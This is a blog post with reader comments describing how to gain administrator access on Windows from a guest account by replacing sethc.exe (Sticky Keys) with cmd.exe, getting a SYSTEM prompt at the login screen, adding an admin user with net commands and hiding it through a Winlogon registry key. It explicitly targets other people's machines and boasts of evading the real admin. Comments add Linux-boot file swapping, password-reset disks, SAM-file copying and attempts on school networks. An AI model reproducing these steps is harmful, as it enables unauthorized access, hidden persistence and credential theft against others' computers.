Gain admin access on windows system using your guest account

Hello All,

Ever thought of how to get into your friend’s system and see the access denied files and folders? Or ever wanted to hack into someone’s admin account? Well here is a method which exploits yet another windows bug.

  1. Have you ever noticed that if you press your system’s SHIFT key >= 5 times continuously a pop up windows occurs with the name “Sticky Keys”? If it doesn’t pop up on your comp, then may be your shortcut is turned off. For enabling it, goto Control
    Panel -> Accessibility Options
    . In the accessibility options under the
    keyboard tab, in sticky keys , click on settings and enable the
    shortcut for sticky keys. And u can do this even with a guest account.
  2. Finally if the following 2 requirements are setup on your system, then you are all set to enter into your admin’s account.
  • On Pressing SHIFT >= 5 times, a pop up should appear.
  • The windows System32 directory should be writable.

Concept:
When u press, the SHIFT key >= 5 times, a file with the name “sethc.exe” is
executed.  You can verify this in TASK manager (don’t close the pop up
window). This file is located in C:\WINDOWS\system32 folder, or
where ever your windows is installed.

The Vulnerability

  1. When SHIFT key is pressed >=5 times, windows executes a file named
    “sethc.exe” located in system32 folder. It doesn’t even check if its the
    same file. Also it runs with the privilege of the CURRENT USER
    which is executing the file i.e if u have logged on as a guest then in
    the TASK manager under processes, it shows your user name as guest.
  2. The file executes even if u log off, and have the windows login screen is
    showed up, BUT THIS TIME SINCE NO USER HAS LOGGED IN IT RUNS WITH
    SYSTEM PRIVILEGE.

Exploitation
If u understand this much, then the exploitation is very simple for you. What we will do is that,
we pick cmd.exe , copy it at a folder other than system32, (because windows
won’t allow u to copy) rename it to sethc.exe, go to system32 folder,
and paste it. Windows will ask, “that another file exists, do u want to
replace?” and after pressing OK, you have replaced the sethc.exe with ur own
cmd.exe. Now if u press SHIFT key >=5 times, a command prompt will
pop-up.


Finally

  1. Now log-off or restart. When you reach the windows
    login screen, press the shift key >=5 times. A command prompt will
    pop up with SYSTEM privilege.
  2. Enter the normal commands as follows:
  3. net user username /add
  4. net user localgroup administrators username /add
  5. And a new user called username with admin privilege will be added.

And thats it, you have admin privilege of the system and you can do what ever you want to with it.

Hiding your fake admin profile
Now you surely don’t want the real admin to track you. Here is what you will have to do to hide yourself from login screens as well as from control panel

  1. Goto registry editor and open this place.
  2. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
  3. Here create a new DWORD value, write its name as the “user name” that u created for your admin account.

Thats it now you are invisible but still admin of the system. Live as admin forever and keep screwing the real admin forever.



Last but not the least (IMPORTANT)
Windows has two type of login screens:

  1. Where the accounts are listed with some pictures.
  2. Where u have to write username and password.

After making the hidden account u will have to login through the 2nd step only. If ur login screen is of Type 1, press ALT-CTRL-DEL twice to get the 2nd type screen.

Thats it!!!

NOTE:
This is a sureshot way to gain admin, if u r a lamer or a newbie
then please do some googling.
I have written almost every detail.

Thanks for reading this far :) Make a comment if you liked this one.

Thanks for digging and shouting it out to your friends.


  • MullahCrazedNiccuh

    Hey Akshay…hope this helps you..
    U can download this bootable iso.”http://www.pogostick.net/~pnh/ntpasswd/”(only 3 mb its zipped)..create a bootable usb drive(u can use Unetbootin or YUMI) and boot via it and clear the administrator password from the computer u wanna use n abracadabra!no password needed to log in to admin..u can access anythn u want

  • MullahCrazedNiccuh

    Hey Akshay…hope this helps you..
    U can download this bootable iso.””(only 3 mb its zipped)..create a bootable usb drive(u can use Unetbootin or YUMI) and boot via it and clear the administrator password from the computer u wanna use n abracadabra!no password needed to log in to admin..u can access anythn u want

  • MullahCrazedNiccuh

    Hey Akshay…hope this helps you..
    U can download this bootable iso.href=”http://www.pogostick.net/~pnh/ntpasswd/” its only 3 mb then create a bootable usb drive(u can use Unetbootin or YUMI) and boot via it and clear the administrator password from the computer u wanna use n abracadabra!no password needed to log in to admin..u can access anythn u want

  • Balu

    Yes it is indeed wonderfull.
    This is better than other windows password recovery tools.
    I was able to do it in the second go.
    Thanks

  • saurabh ahuja

    hello sir ,
    sir i have problem in copying the sethc.exe in system32.plz give me answer as soon as possible..
    thanks….

  • Mr.Singh

    The information provided by you is really intresting and new for me, but there is one problem that came in front of me when i tried to change the administrator password using guest account.When i logged in using a guest account it the SYSTEM32 folder becomes read only and windows don’t allow me to make any changes in system32 folder due to which i cannot replace the SCTCH.EXE file .

    Please reply me the solution what i can i do to change the password of admin using guest account. As, the SYSTEM#@ is only read only.

    Thanks in advance

  • et phone home

    this hack does not work for computers with high security, I tried every way to get the files to go in to system32 but get access denied for copying WTF. Apparently the admins know of this hack and have protected the computers, the sethc.exe does not even show up in the system32 i had to search it.

  • http://vscrapnetwork.co.cc Fallen Memories

    Hello, this hack is too old now and you should update it.. and also, only few systems would allow Guest accounts to overwrite system32 files…
    you can try this …

    1. Download Ubuntu or any linux with GUI (for noob purposes) Ubuntu 11.04 or 10.04 would do.
    2. Install it on a USB thumb drive using either unetbootin or universal installer from pendrivelinux
    3. boot from the USB drive
    4. a window would ask you if you want to install ubuntu or try it. select try it.
    5. goto HOME folder.
    6. in the upper left side of the window, you could see Mounted drives, select the first drive in the list. take note, it would have an icon of a hard drive.
    7. double click that.
    8. if you saw a folder named Windows, that’s the drive we want, if not, try the others in the list.
    9. in the drive we selected,
    GOTO Windows> System32
    10. now find CMD.exe, copy it and paste it on the desktop, rename it SETHC.exe
    11. then drag the renamed CMD.exe from the desktop to the folder System32.
    you would be ask if you want to overwrite the existing SETHC.exe, click Yes to confirm.
    12. Reboot. the hack would now be possible.

    you can press the shift key, 5 times to bring out the Command prompt

    (this would only possible if you successfully followed what i have said earlier. IT’S 100% WORKING, TRIED AND TESTED ON DIFFERENT SYSTEMS, INCLUDING NETWORKED COMPUTERS FROM COLLEGE UNIVERSITIES) ^_^ thankx

  • Omega.

    Hey all of you,
    First of all the system file does’nt get replaced.Someone help me wid that.@Abhinav as you asked what message comes and provide some info about dat it comes access is denied.The file is being used by someone else.Dats what comes.Please help me.
    Thanks.

  • Omega.

    Does ne1 noe how to store input in a bat or vbs file???

  • noob

    when i tried to copy the sethc.exe into system32 it said I needed the admin password which is a real problem for me because I am only doing this cuz I changed my password a while ago and forgot what it was so I need to use “net user administration *” to change my password

  • Anas Abdalla

    Thanks
    I’ve Juts do it using mini win xp fron Herin’s bootable CD to replace sethc.exe file, and it works just fine.

  • johnny darwin

    Ahhhhhhhh

    Cooooooool.

    Worked like charm

    My son is so happy (and afraid also, as now he cannot hide his files, I will CRACK his admin password)

    WOW

    Thanks

  • dude

    How do you take it back to normal? Which files need deleted out of c?? Please respond soon really need to know

  • Nice

    Thanks, nice stuff.

    I liked the phrase “Live as admin forever and keep screwing the real admin forever.”

  • prakash

    just follow MullahCrazedNiccuh idea of booting with llinux from USB and copy the SAM(the file where windows store all users password) file located in windows\system32\config copy it, paste it anywhere, eg: pendrive,. open the SAM file after you reboot the computer then you will find a long code then u can google it to decode it into plain text….

  • http://hristu.net Bob Saget The Third

    Can’t drag the new “sethc.exe” file to System32 folder :(

    • Nice

      To my knowledge this will only work on a window xp system without service packs. Service packs cover up these holes in the operating system.

  • Quadri Imran

    Hey Bro! What if id dont have system32 folder only redable this trick wont worked for me please give something which will work for me!!!

  • Aniruddh Agarwal

    Worked like a charm with the Linux method! My little brother forgot the password of the only account of his PC, but fortunately he still had a guest account with which I activated Sticky Keys. The rest was done by Linux!

  • poopy head

    i tried but i cant copy into system32

  • Diell Morina

    Hey, everything’s good, but the I can’t turn on the fuckin sticky keys!! I can change it by Eease of Access nor by Narrator before loggin’ in(when you have to choose which user you want to log in). When I turn it on from Ease of Access it doesn’t do anything, even though I press sticky keys like 1000000000 times. Also when I try to do it by he Ease of Acces(narrator thingy)before loggin in, it pops up a message”error starting sound agent. There may be no sounds for FilterKeys or StickyKeys”, and doesn’t let me press OK and change the pass’.

    Please help!

    • Prankster855

      It starts up, goto your task manager.

  • Demolition Man

    it’s working with win XP sp2 only

    are you have another way for win 7,8 or xp sp3

    thanks alot

  • http://saff ibbi

    I’ve just done it on Win XP SP3, works like a charm, I’d blow the admin if he was in front of me at the time.

  • Exerver

    I tried this on my school network, sadly I can’t overwrite files in the system32. Any way to get passed this?

  • Josh

    It still asks me for admin privliges when a copy the sethc.exe(cmd.exe) file to system 32 please tell me if i did anything wrong like skipped a step

  • http://mkj.co.in MKJ

    Peoples are more interested in such stuff then xmpp. heheh ;) :p

  • Verity

    Hey, i’m trying this because i forgot my admin password and my guest account doesn’t let me download anything. I’ve done everything, but the last couple of steps aren’t working. I’ve typed “net user username/add” and entered and then “net user localgroup administrators username/add” But no new user has been added?:| help

    • Prankster855

      o:dp username (SPACE) /add DERP

  • midhun

    i had changed CMD into sethc.exe but i cant copy it again to my windows system 32 file. what should i do

  • Bob

    A few days ago, I had met the headache things that I had forgotten Windows login password. The login screen rejected my passwords. I was frustrated because there was very important data on my disk and I couldn’t reinstall the OS. ………….
    However, I fortunately got to know the PCUnlocker utility, which is a professional windows password recovery tool for us to reset windows password instantly yet no data loss.

  • Jonathan Cauthorn

    Correction to this step:
    net user localgroup administrators username /add
    should remove the “user” and should read:
    net localgroup administrators username /add

    Simple typo.